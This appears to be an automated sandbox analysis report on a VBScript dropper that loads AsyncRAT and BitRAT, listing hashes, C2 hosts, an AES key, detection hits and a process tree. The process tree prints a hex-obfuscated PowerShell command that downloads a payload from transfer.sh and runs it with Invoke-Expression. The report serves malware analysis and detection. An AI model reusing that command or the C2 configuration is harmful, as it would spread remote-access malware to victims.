Analysis
- max time kernel: 150s
- max time network: 185s
- platform: windows7_x64
- resource: win7v20210408
- submitted: 14/08/2021, 06:40
- Static task: static1
- Behavioral task: behavioral1
- Sample: W092.vbs
- Resource: win7v20210408
General
- Target: W092.vbs
- Size: 1KB
- MD5: eaecbd393f2fffd8522e5d4c7b8b6f7d
- SHA1: 6a9ac84f1c4778cf41ef45b2906919f99a06acf5
- SHA256: 414a79e6c87489cb73e9176e867d554788a28ba86cb4e00f3f8fed15400999bd
- SHA512: 8c24cf0f221c9de102adbfc21f3f762a06b4041963534021ffa7ba4174e149577adb00425066157c9257c3a0f407490754bf58090f8da9096cbe8970b57a42ae
Malware Config

Extracted
- http://transfer.sh/1T8qkDx/ko.txt

Extracted
- Family: asyncrat
- Version: 0.5.7B
- C2:
  - asyncpc.duckdns.org:6650
  - asyncpc.duckdns.org:9034
  - asyncpc.duckdns.org:6890
  - asyncpc.duckdns.org:7829
  - 13.77.222.211:6650
  - 13.77.222.211:9034
  - 13.77.222.211:6890
  - 13.77.222.211:7829
- Mutex: AsyncMutex_6SI8OkPnk
- Attributes:
  - aes_key: PYYzntkVFJfMofAe4qQYi6HmHf8Kj3BT
  - anti_detection: false
  - autorun: false
  - bdos: false
  - delay: Default
  - host: asyncpc.duckdns.org,13.77.222.211
  - hwid: 3
  - install_file:
  - install_folder: %AppData%
  - mutex: AsyncMutex_6SI8OkPnk
  - pastebin_config: null
  - port: 6650,9034,6890,7829
  - version: 0.5.7B
Signatures

BitRAT Payload (2 IoCs)
- resource: behavioral1/memory/1548-98-0x00000000007E2740-mapping.dmp; yara_rule: family_bitrat
- resource: behavioral1/memory/1548-101-0x0000000000400000-0x00000000007E4000-memory.dmp; yara_rule: family_bitrat
suricata: ET MALWARE Observed Malicious SSL Cert (AsyncRAT Server)

suricata: ET MALWARE Observed Malicious SSL Cert (BitRAT CnC)
Async RAT payload (3 IoCs)
- resource: behavioral1/memory/936-90-0x0000000000400000-0x0000000000412000-memory.dmp; yara_rule: asyncrat
- resource: behavioral1/memory/936-91-0x000000000040D11E-mapping.dmp; yara_rule: asyncrat
- resource: behavioral1/memory/936-92-0x0000000000400000-0x0000000000412000-memory.dmp; yara_rule: asyncrat

Blocklisted process makes network request (1 IoC)
- flow: 7; pid: 1376; Process: powershell.exe

YARA match: upx (2 IoCs)
- resource: behavioral1/memory/1548-97-0x0000000000400000-0x00000000007E4000-memory.dmp; yara_rule: upx
- resource: behavioral1/memory/1548-101-0x0000000000400000-0x00000000007E4000-memory.dmp; yara_rule: upx

Adds Run key to start application (2 TTPs, 1 IoC)
- description: Set value (str); ioc: \REGISTRY\USER\S-1-5-21-2455352368-1077083310-2879168483-1000\Software\Microsoft\Windows\CurrentVersion\Run\Google = "C:\\Users\\Admin\\AppData\\Local\\Appdata\\Google.exe"; Process: aspnet_regbrowsers.exe

Suspicious use of NtSetInformationThreadHideFromDebugger (5 IoCs)
- pid: 1548; Process: aspnet_regbrowsers.exe (5 occurrences)

Suspicious use of SetThreadContext (2 IoCs)
- description: PID 1376 set thread context of 936; pid: 1376; Process: powershell.exe; procid_target: 31
- description: PID 1376 set thread context of 1548; pid: 1376; Process: powershell.exe; procid_target: 33

Enumerates physical storage devices (1 TTP)
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

Suspicious behavior: EnumeratesProcesses (4 IoCs)
- pid: 1376; Process: powershell.exe (4 occurrences)

Suspicious use of AdjustPrivilegeToken (4 IoCs)
- description: Token: SeDebugPrivilege; pid: 1376; Process: powershell.exe
- description: Token: SeDebugPrivilege; pid: 936; Process: aspnet_regbrowsers.exe
- description: Token: SeDebugPrivilege; pid: 1548; Process: aspnet_regbrowsers.exe
- description: Token: SeShutdownPrivilege; pid: 1548; Process: aspnet_regbrowsers.exe

Suspicious use of SetWindowsHookEx (2 IoCs)
- pid: 1548; Process: aspnet_regbrowsers.exe (2 occurrences)

Suspicious use of WriteProcessMemory (20 IoCs)
- description: PID 1840 wrote to memory of 1376; pid: 1840; Process: WScript.exe; procid_target: 29 (3 occurrences)
- description: PID 1376 wrote to memory of 936; pid: 1376; Process: powershell.exe; procid_target: 31 (9 occurrences)
- description: PID 1376 wrote to memory of 1548; pid: 1376; Process: powershell.exe; procid_target: 33 (8 occurrences)
Processes

C:\Windows\System32\WScript.exe (depth 1)
  Command line: "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\W092.vbs"
  PID: 1840
  - Suspicious use of WriteProcessMemory

  C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe (depth 2)
    Command line: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" $TRUMP ='http://transfer.sh/1T8qkDx/ko.txt';$SOS='24-42-20-3d-27-45-54-48-20-43-4f-49-4e-74-2e-57-54-46-20-43-4f-49-4e-6c-49-4f-53-4e-54-27-2e-52-65-70-6c-61-63-65-28-27-45-54-48-20-43-4f-49-4e-27-2c-27-6e-45-27-29-2e-52-65-70-6c-61-63-65-28-27-54-46-20-43-4f-49-4e-27-2c-27-45-62-43-27-29-2e-52-65-70-6c-61-63-65-28-27-4f-53-27-2c-27-65-27-29-3b-24-43-43-20-3d-20-27-44-4f-53-20-43-4f-49-4e-20-4c-53-4f-53-43-4f-49-4e-6e-47-27-2e-52-65-70-6c-61-63-65-28-27-53-20-43-4f-49-4e-20-27-2c-27-57-6e-27-29-2e-52-65-70-6c-61-63-65-28-27-53-4f-27-2c-27-6f-61-44-27-29-2e-52-65-70-6c-61-63-65-28-27-43-4f-49-4e-27-2c-27-54-72-49-27-29-3b-24-41-20-3d-27-49-60-45-6f-73-20-43-4f-49-4e-60-57-60-42-54-43-20-43-4f-49-4e-6a-60-45-54-48-20-43-4f-49-4e-20-24-42-29-2e-24-43-43-28-24-54-52-55-4d-50-29-27-2e-52-65-70-6c-61-63-65-28-27-6f-73-20-43-4f-49-4e-27-2c-27-58-28-6e-60-65-27-29-2e-52-65-70-6c-61-63-65-28-27-42-54-43-20-43-4f-49-4e-27-2c-27-2d-4f-62-27-29-2e-52-65-70-6c-61-63-65-28-27-54-48-20-43-4f-49-4e-27-2c-27-60-63-60-54-27-29-3b-26-28-27-49-27-2b-27-45-58-27-29-28-24-41-20-2d-4a-6f-69-6e-20-27-27-29-7c-26-28-27-49-27-2b-27-45-58-27-29-3b';Invoke-Expression (-join ($SOS -split '-' | ? { $_ } | % { [char][convert]::ToUInt32($_,16) }))
    PID: 1376
    - Blocklisted process makes network request
    - Suspicious use of SetThreadContext
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    - Suspicious use of WriteProcessMemory

    C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regbrowsers.exe (depth 3)
      Command line: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regbrowsers.exe"
      PID: 936
      - Suspicious use of AdjustPrivilegeToken

    C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regbrowsers.exe (depth 3)
      Command line: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regbrowsers.exe"
      PID: 1548
      - Adds Run key to start application
      - Suspicious use of NtSetInformationThreadHideFromDebugger
      - Suspicious use of AdjustPrivilegeToken
      - Suspicious use of SetWindowsHookEx